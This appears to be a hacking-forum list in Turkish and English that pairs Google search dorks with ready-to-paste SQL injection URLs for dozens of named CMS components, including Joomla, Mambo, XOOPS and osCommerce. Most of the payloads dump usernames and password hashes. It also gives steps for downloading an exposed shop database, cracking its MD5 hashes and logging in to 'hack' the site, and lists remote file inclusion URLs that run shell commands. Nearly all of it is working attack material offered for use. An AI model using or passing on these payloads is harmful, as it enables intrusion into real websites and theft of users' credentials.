DORK 11 : allinurl:"com_na_qforms"
DORK 12 : allinurl:"com_na_gallery2"
DORK 13 : allinurl:"com_na_publicrss"
DORK 14 : allinurl:"index.php?kwd"
EXPLOİT:
index.php?option=com_sermon&gid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0,0,username,passwo rd%2C0%2C0%2C0/**/from/**/mos_users/*
Com-Comments Açığı
Dork: "Review ******", "Phil Taylor"
Exploit:
index.php?option=com_comments&task=view&id=-1+UNION+SELECT+0,999999,concat(username,0x3a,PASSW ORD),0,0,0,0,0,0+FROM+mos_users+union+select+*+fro m+mos_content_comments+where+1=1
Portfolio Manager 1.0 Açığı
Dork: inurl:"index.php?option=com_portfolio"
Exploit:
http://site.com/index.php?option=com_portfolio&memberId=9&category Id=-1+union+select+1,2,3,concat(username,0x3a,password ),5,6,7,8,9,10,11,12+from+mos_users/*
Com-Astatspro Açığı
Dork: allinurl: "com_astatspro"
PoC: administrator/components/com_astatspro/refer.php?id=-1/**/union/**/select/**/0,concat(username,0x3a,password,0x3a,usertype),con cat(username,0x3a,password,0x3a,usertype)/**/from/**/jos_users/*
Gelen sayfada sağ tıkla kaynağı görüntüle.
<H1>302 Moved</H1>
The document has moved <A HREF="admin:c9cb9115e90580e14a0407ed1fcf8039:Super Administrator">here</A>.
Bu bölümde md5 saklıdır.
Modified By Fully Açığı
DORK : allinurl :kb.php?mode=article&k
DORK : "Powered by phpBB © 2001, 2006 phpBB Group" veya "Modified by Fully Modded phpBB © 2002, 2006"
EXPLOIT :
kb.php?mode=article&k=-1+union+select+1,1,concat(user_id,char(58),usernam e,char(58),user_password),4,5,6,7,8,9,10,11,12,13+ from+phpbb_users+where+user_id+=2&page_num=2&cat=1
Easy-Clanpage v2.2 Açığı
Dork: "Easy-Clanpage v2.2"
Example -1/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7/**/from/**/ecp_user/**/where/**/userid=1/*
BM Classifieds Açığı
Dork 1 : ''showad.php?listingid=''
Dork 2 : ''pfriendly.php?ad=''
EXPLOIT:
showad.php?listingid=xCoRpiTx&cat=-99/**/union+select/**/concat(username,0x3a,email),password,2/**/from/**/users/*
pfriendly.php?ad=-99%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0 ,1,concat(username,0x3a,email),password,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27%2F%2A%2A%2Ffrom%2F%2A%2A%2Fusers%2F%2A%2A%2F
Porar WebBoart Açığı
DorK : '' webboard question.asp QID''
EXPLOIT:
question.asp?QID=-1122334455%20+%20union%20+%20select%20+%200,null,2 ,username,password,5,password,7,8,9,null%20+%20fro m%20+%20+%20administrator%20';';
Com-Noticias Açığı
DorK : ''com_noticias''
EXPLOIT: index.php?option=com_noticias&Itemid=xcorpitx&task =detalhe&id=-99887766/**/union/**/%20select/**/0,concat##(username,0x3a,password,0x3a,email),2,3, 4,5/**/%20from/**/%20jos_users/*
ASPapp -links.asp Açığı
dork - ''links.asp?CatId''
links.asp?CatId=-99999%20UNION%20SELECT%20null,accesslevel,null,nul l,user_name,%205%20,password,null%20FROM%20Users
admin login-
www.xxx.com/path/login.asp?ret_page=%2Fzmicer%2Fweb%2Fadmin%2Easp%3 F
Modules-Viso Açığı
DORKS 1 : allinurl :"modules/viso"
EXPLOIT 1 :
modules/viso/index.php?kid=-9999999/**/union/**/select/**/0,0x3a,uname,0x3a,0x3a,0x3a,pass/**/from/**/exv2_users/*where%20exv2_admin%201
EXPLOIT 2 :
modules/viso/index.php?kid=-9999999/**/union/**/select/**/0,0x3a,uname,0x3a,0x3a,0x3a,pass,pass/**/from/**/exv2_users/*where%20exv2_admin%201
Bookmarkx ****** Açığı
DorK 1 : "2007 BookmarkX ******"
DORK 2 : Powered by GengoliaWebStudio
DORK 3 : allinurl :"index.php?menu=showtopic"
EXPLOIT :
index.php?menu=showtopic&topicid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(auser,0x3a,apass),4,5,6/**/FROM/**/admin/*%20admin=1
veya;
index.php?menu=showtopic&topicid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(auser,0x3a,apass),4,5,6,7/**/FROM/**/admin/*%20admin=1
Com-Profiler Açığı
DORK: allinurl:com_comprofiler
Exploit: /index.php?option=com_comprofiler&task=userProfile& user=[SQL]
Example: /index.php?option=com_comprofiler&task=userProfile& user=1/**/and/**/mid((select/**/password/**/from/**/jos_users/**/limit/**/0,1),1,1)/**/</**/Char(97)/*
Com-Jpad Açığı
DORK: allinurl:com_jpad
Example: /index.php?option=com_jpad&task=edit&Itemid=39&cid=-1 UNION ALL SELECT 1,2,3,concat_ws(0x3a,username,password),5,6,7,8 from jos_users--
PostSchedule Açığı
Google Dork : "PostSchedule ver 1"
Exploid:
index.php?module=PostSchedule&view=event&eid=-1')+union+select+0,1,2,3,4,5,6,7,8,concat(pn_uname ,char(58),pn_pass),10,11,12,13/**/from/**/nuke_users/**/where/**/pn_uid=2/*
joomla SQL Injection(Com-Jokes) Açığı
DorK : allinurl: "com_jokes"
EXPLOIT :
index.php?option=com_jokes&Itemid=bgh7&func=CatVie w&cat=-776655/**/union/**/select/**/0,1,2,3,username,5,password,7,8/**/from/**/mos_users/*
Com_Estateagent Açığı
Dork : allinurl: "com_estateagent"
EXPLOIT :
index.php?option=com_estateagent&Itemid=bgh7&func= showObject&info=contact&objid=-9999/**/union/**/select/**/username,password/**/from/**/mos_users/*&results=xxxx
Com-Fq Açığı
DorK: allinurl: "com_fq"
EXPLOIT :
index.php?option=com_fq&Itemid=S@BUN&listid=999999 9/**/union/**/select/**/name,password/**/from/**/mos_users/*
Com-Mamml Açığı
DorK : allinurl: "com_mamml"
EXPLOIT :
index.php?option=com_mamml&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*
joomla SQL Injection(com_gallery) Açığı
DORK : allinurl: com_gallery "func"
EXPLOIT 1 :
index.php?option=com_gallery&Itemid=0&func=detail& id=-99999/**/union/**/select/**/0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,use rname/**/from/**/mos_users/*
EXPLOİT 2 :
index.php?option=com_gallery&Itemid=0&func=detail& id=-999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A %2F0%2C1%2Cpassword%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C 0%2C0%2C0%2Cusername%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmo s_users
Joomla Component Profiler Açığı
DORK: allinurl:com_comprofiler
Exploit: /index.php?option=com_comprofiler&task=userProfile& user=[SQL]
Example: /index.php?option=com_comprofiler&task=userProfile& user=1/**/and/**/mid((select/**/password/**/from/**/jos_users/**/limit/**/0,1),1,1)/**/</**/Char(97)/*
Joomla Component Filiale SQL Injection Açığı
DORK : inurl:com_filiale
Exploit : /index.php?option=com_filiale&idFiliale=-5+union+select+1,password,3,4,username,6,7,8,9,10, 11+from+jos_users
FlippingBook Açığı
DORK : inurl:com_flippingbook
Exploit :
/index.php?option=com_flippingbook&Itemid=28&book_i d=null/**/union/**/select/**/null,concat(username,0x3e,password),null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null/**/from/**/jos_users/*
Pagenum Açığı
DORK : allinurl: " list.php?pagenum"
EXPLOIT
list.php?pagenum=0&categoryid=1+union+select+111,2 22,concat_ws(char(58),login,password),444+from+adm in_login/*
Modules-Tutorials Açığı
DORK 1 : allinurl :"/modules/tutorials/"
DORK 2 : allinurl :"/modules/tutorials/"tid
EXPLOIT 1 :
modules/tutorials/printpage.php?tid=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),1,concat(uname,0x3a,pass), 3,4,5/**/from/**/xoops_users/*
EXPLOIT 2 :
modules/tutorials/index.php?op=printpage&tid=-9999999/**/union/**/select/**/0,1,concat(uname,0x3a,pass),3/**/from/**/xoops_users/*
Modules-Glossaires Açığı
DORK : allinurl: "modules/glossaires"
EXPLOIT :
modules/glossaires/glossaires-p-f.php?op=ImprDef&sid=99999/**/union/**/select/**/000,pass,uname,pass/**/from/**/xoops_users/*where%20terme
OsCommerce SQL Injection Açığı
Google Dork: inurl:"customer_testimonials.php"
Exploit:
http://site.com/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*
Not: Aynı zamanda yönetici değilde bütün üyelerin md5 lerini karşınıza dizer.
Tr ****** News v2.1 Açığı
Google Dork: inurl:news.php?mode=voir
Exploid: news.php?mode=voir&nb=-1/**/UNION/**/SELECT/**/1,2,3,4,concat_ws(0x3a,pseudo,pass,email),6,7/**/from/**/tr_user_news/*
Admin girişi = /admin
Com-Alberghi Açığı
DORK 1 : allinurl: "" detail
DORK 2 : allinurl: "com_alberghi"
EXPLOIT 1 :
index.php?option=com_alberghi&task=detail&Itemid=S @BUN&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2 ,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,con cat(username,0x3a,password)/**/from/**/jos_users/*
EXPLOIT 2 :
index.php?option=com_alberghi&task=detail&Itemid=S @BUN&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2 ,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3 ,3,3,3,concat(username,0x3a,password)/**/from/**/jos_users/*
Powered By Joovideo V1.0 Açığı
DORK 1 : allinurl: "com_joovideo" detail
DORK 2 : allinurl: "com_joovideo"
DORK 3 : Powered by joovideo V1.0
EXPLOIT :
index.php?option=com_joovideo&Itemid=S@BUN&task=de tail&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,2,2,2,2 ,2,concat(username,0x3a,password)/**/from/**/jos_users/*
AllMy-Guests ****** Açığı
Açığı bulunan ******: AllMyGuests
Google Dork: "powered by AllMyGuests" (Tırnaklar yok)
Example (Exploid): http://site.de/allmyguest/index.php?AMG_open=comments&AMG_id=null+UNION+SELE CT+1,2,3,concat_ws(0x203a20,user_name,user_passwor d,user_email),5,6,7+from+allmyphp_user+where+user_ id=1--
123FlashChat Açığı
DORKS : "123flashchat.php"
EXPLOITS :
Http://localhost/path/123flashchat.php?e107path=Shell
AlphaContent 2.5.8 © Açığı
DORK 1 : inurl: "com_alphacontent"
DORK 2 : "AlphaContent 2.5.8 © 2005-2008 - visualclinic.fr"
Exploit :
index.php?option=com_alphacontent§ion=6&cat=15 &task=view&id=-999999/**/union/**/select/**/1,concat(username,0x3e,password),3,4,user(),user() ,user(),user(),user(),user(),user(),user(),user(), user(),user(),user(),user(),user(),user(),user(),u ser(),user(),user(),user(),user(),user(),user(),us er(),user(),user(),user(),user(),user(),user(),use r(),user(),user(),user(),39/**/from/**/jos_users/*
Mambo Component (com-downloads) Açığı
DORK : allinurl :"com_downloads"filecatid
EXPLOIT :
index.php?option=com_downloads&Itemid=S@BUN&func=s electfolder&filecatid=-1/**/union/**/select/**/concat(username,0x3a,password),concat(username,0x3 a,password),concat(username,0x3a,password)/**/from/**/mos_users/*
MiniNuke 2.1 Açığı
DORK 1 : allinurl:"members.asp?action"
DORK 2 : allinurl: "members.asp"uid
EXPLOIT 1 :
members.asp?action=member_details&uid=-1%20union%20select%200,sifre,0,0,0,0,0,kul_adi,0,s ifre,kul_adi,sifre,1,1,1,sifre,1,1,1,isim,1,1,1,1, 1,1,1,1%20from%20members
EXPLOIT 2 :
members.asp?action=member_details&uid=-1%20union%20select%200,0,0,0,0,0,0,sifre,0,sifre,0 ,1,1,sifre,14,sifre,1,1,1,1,2,1,2,2,2,2,2,2,2,2%20 from%20members
EXPLLOIT 3 :
members.asp?action=member_details&uid=-1%20union%20select%200,1,sifre,0,0,0,0,0,0,0,1,1,1 ,1,1,1,1,1,1,1,2,2,kul_adi,sifre,2,kul_adi,sifre,2 ,2,2,sifre,3,3,3,isim,3,3,3,3,3,4,4,4%20from%20mem bers
Modules-WebChat Vulnerability
DORK : allinurl :"modules/WebChat"
EXPLOIT :
modules/WebChat/index.php?roomid=-9999999/**/union/**/select/**/0,uname,0x3a,0x3a,pass/**/from/**/exv2_users/*where%20exv2_admin%201
Modules-Recipe Vulnerability
DORK : allinurl :"modules/recipe"
EXPLOIT :
modules/recipe/detail.php?id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2
Fselect/**/0,0,uname,pass,111,222+from%2F%2A%2A%2Fxoops_users/*
eXV2 MyAnnonces Vulnerability
DORK : eXV2 MyAnnonces
EXPLOIT :
modules/MyAnnonces/annonces-p-f.php?op=ImprAnn&lid=-9999999/**/union/**/select/**/pass,pass,uname,0x3a,0x3a,0x3a,0x3a,0,0,0,0x3a,0x3 a,1/**/from/**/exv2_users/*where%20exv2_admin%201
Modules-Dictionary Vulnerability
DORK 1 : allinurl: "modules/dictionary"
DORK 2 : allinurl: "modules/dictionary/print.php?id"
EXPLOIT :
modules/dictionary/print.php?id=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/*
Affected versions:
Dictionary Version 0.94 by nagl.ch
Dictionary Version 0.91 by nagl.ch
Dictionary Version 0.70 by nagl.ch
Com-Restaurante Vulnerability
DORK : allinurl: "com_restaurante"
EXPLOIT :
index.php?option=com_restaurante&task=detail&Itemi d=S@BUN&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2 ,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,4,4,4,4,conca t(username,0x3a,password)/**/from/**/jos_users/*
Com-Accombo Vulnerability
DORK : allinurl: "com_accombo"
EXPLOIT :
index.php?option=com_accombo&func=detail&Itemid=S@ BUN&id=-99999/**/union/**/select/**/0,1,0x3a,3,4,5,6,7,8,9,10,11,12,concat(username,0x 3a,password)/**/from/**/mos_users/*
Powered By Runcms Vulnerability
DORK 1 : allinurl: "modules/photo/viewcat.php?id"
DORK 2 : inurlhoto "powered by runcms"
EXPLOIT :
admin/exploit
modules/photo/viewcat.php?id=150&cid=-99999/**/union/**/select/**/0,uname/**/from/**/runcms_users/*
pass/exploit
modules/photo/viewcat.php?id=150&cid=-99999/**/union/**/select/**/0,pass/**/from/**/runcms_users/*
Note: If we paste the admin/exploit at the end of the site URL, it returns the admin nickname.
If we paste the pass/exploit, it returns the MD5 hashes.
Admin login:
http://www.bbb.net/admin
Powered By Download 3000 Vulnerability
DORK 1 : "Powered by Download 3000"
DORK 2 : allinurl: "com_d3000"
EXPLOiT :
index.php?option=com_d3000&task=showarticles&id=-99999/**/union/**/select/**/0,username,pass_word/**/from/**/admin/*
Powered By Smoothflash Vulnerability
DORK 1 : "Powered by Smoothflash"
DORK 2 : allinurl: "admin_view_image.php"
EXPLOiT :
admin_view_image.php?cid=-99999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/lwsp_users
Com-Ahsshop Vulnerability
DORK : allinurl: "com_ahsshop"do=default
EXPLOiT 1 :
index.php?option=com_ahsshop&do=default&vara=-99999/**/union/**/select/**/0,concat(username,0x3a,password),0x3a,3,4,0x3a,6,0 x3a/**/from/**/mos_users/*
EXPLOiT 2 :
index.php?option=com_ahsshop&do=default&vara=-99999/**/union/**/select/**/concat(username,0x3a,password),1/**/from/**/mos_users/*
Mod-Archives Vulnerability
DORK : allinurl: "index.php?mod=archives"
EXPLOiT :
index.php?mod=archives&ac=voir&id=-99999/**/union/**/select/**/0,concat(pseudo,0x3a,pass),2,3,4,5,concat(pseudo,0 x3a,pass),7,8,9,10,11,12,13/**/from/**/users/*
EXPLOiT 2:
index.php?mod=archives&ac=voir&id=-99999/**/union/**/select/**/0,concat(pseudo,0x3a,pass),2,3,4,5,concat(pseudo,0 x3a,pass),7,8,9,10/**/from/**/users/*
EXPLOiT 3:
index.php?mod=archives&ac=voir&id=-99999/**/union/**/select/**/0,concat(pseudo,0x3a,pass),2,3,4,5,concat(pseudo,0 x3a,pass),7,8,9,10,11,12,13,14/**/from/**/users/*
Galery-Action Vulnerability
DORK : allinurl: "index.php?mod=galerie"action=gal
EXPLOiT :
index.php?mod=galerie&action=gal&id_gal=-99999/**/union/**/select/**/0,1,concat(pseudo,0x3a,pass),concat(pseudo,0x3a,pa ss),4,5,6,7/**/from/**/users/*
Powered By Site Sift Vulnerability
DORK 1 : powered by Site Sift
DORK 2 : allinurl: "index php go addpage"
DORK 3 : allinurl: "index.php?go=detail id="
EXPLOiT 1:
index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,1 0,11,12,13,14,15,16/**/from/**/admin/*
EXPLOiT 2:
index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20/**/from/**/admin/*
Galery-Img Vulnerability
DORK : allinurl: "index.php?p=gallerypic img_id"
EXPLOiT 1:
index.php?p=gallerypic&img_id=-1+union+select+0,1,2,concat(email,0x3a,pass),4,5,6 ,7,8+from+koobi4_user
EXPLOiT 2:
index.php?p=gallerypic&img_id=-1+union+select+0,1,2,concat(email,0x3a,pass),4,5,6 ,7,8+from+koobi_user
Galid-Galeri Vulnerability
DORK : allinurl: galid "index.php?p=gallerypic"
EXPLOiT :
index.php?p=gallerypic&img_id=S@BUN&galid=-1+union+select+0,concat(email,0x3a,pass),2+from+kp ro_user
Area-Galid Vulnerability
DORK : allinurl: "index.php?area"galid
EXPLOiT :
index.php?area=1&p=gallery&action=showimages&galid =-1+union+select+0,concat(email,0x3a,pass),2+from+kp ro_user
Shop-Categ Vulnerability
DORK : allinurl: "index php p shop"categ
EXPLOiT :
index.php?p=shop&show=showdetail&fid=S@BUN&categ=-1+union+select+0,concat(email,0x3a,pass),2+from+kp ro_user
Showlink Vulnerability
DORK : allinurl: "index.php?showlink"links
EXPLOiT :
index.php?showlink=BGH7&fid=BGH78&p=links&area=1&c ateg=-1+union+select+0,concat(email,0x3a,pass),2+from+kp ro_user
admin login=admin/login.php
RS MAXSOFT Vulnerability
DORK 1 : "RS MAXSOFT"
DORK 2 : "Provozováno na RS MAXSOFT"
EXPLOiT:
modules/fotogalerie/popup_img.php?fotoID=-1+union+select+concat(login,0x3a,pass)+from+admin
PollBooth Vulnerability
DORK : allinurl: "pollBooth.php?op=results"pollID
EXPLOiT :
pollBooth.php?op=results&pollID=-1+union+select+password,1,2,3+from+users
Showresult Vulnerability
DORK 1 : allinurl: "index.php?p=poll"showresult
DORK 2 : allinurl: poll_id "showresult"
EXPLOiT :
index.php?p=poll&showresult=1&poll_id=-1+union+select+concat(email,0x3a,pass),1,2,3+from+ kpro_user
Fpdb/shop.mdb Vulnerability
We will search on google.com:
inurl:"mall/lobby.asp
Then append ''fpdb/shop.mdb'' (without the quotes) to the end of the resulting site's URL.
Example: http://www.gemdepot.com/mall/lobby.asp
http://www.gemdepot.com/fpdb/shop.mdb
A file with the .mdb extension appears; we choose Save As and open it...
We take the password hidden in the mdb, crack it on an MD5-cracking site, log in to the site and hack it...
Xoops Vulnerability
Dork: inurl:/modules/wfsection/
Exploit:
print.php?articleid=9999999 union select 1111,2222,3333,4444,concat(char(117,115,101,114,11 0,97,109,101,58),u*****char(112,97,115,115,119,111 ,114,100,58),pass),6666,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0 from xoops_users where uid like 1/*
Com_shambo2 Vulnerability
Dork (the code we will search for on Google): "inurl:com_shambo2" (without the quotes.)
Exploit (the code we will append to the end of the site URL):
index.php?option=com_shambo2&Itemid=-999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A %2F0%2C1%2Cconcat(username,0x3a,password)%2C0%2C0% 2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2F %2A%2A%2Ffrom%2F%2A%2A%2Fmos_users
PHP-Calendar Vulnerability
Search : google.com => intitle:"EasyPHPCalendar
Append to the end of the site URL (any one of these):
/calendar/calendar.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
/calendar/functions/popup.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
/calendar/events/header.inc.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
/calendar/events/datePicker.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
/calendar/setup/setupSQL.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
/calendar/setup/header.inc.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
That's all from me. Happy hacking!